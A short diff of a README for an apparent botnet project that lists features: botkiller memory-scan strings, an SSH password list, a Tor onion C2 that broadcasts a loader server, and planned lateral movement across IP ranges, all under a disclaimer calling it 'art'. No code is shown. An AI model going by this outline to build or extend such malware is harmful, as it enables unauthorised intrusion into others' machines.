freakanonymous/enemy/README.md

 * custom botkiller strings for memory scanning
 * 1s sleep on botkill
 * custom passlist for ssh
+* custom tor cnc for onion that broadcasts loader server

 # TODO
 + lateral movement accross current ip range
 # I ASSUME NO RESPONSIBILITY FOR ANY DAMAGES CAUSED BY THIS PROGRAM, SOURCE CODE, OR ASSOCIATED FILES POSTED.
-# THIS IS POSTED UNDER CREATIVE COMMONS LICENSE AND IS ART.
+# THIS IS POSTED UNDER APACHE LICENSE AND IS ALSO CONSIDERED ART.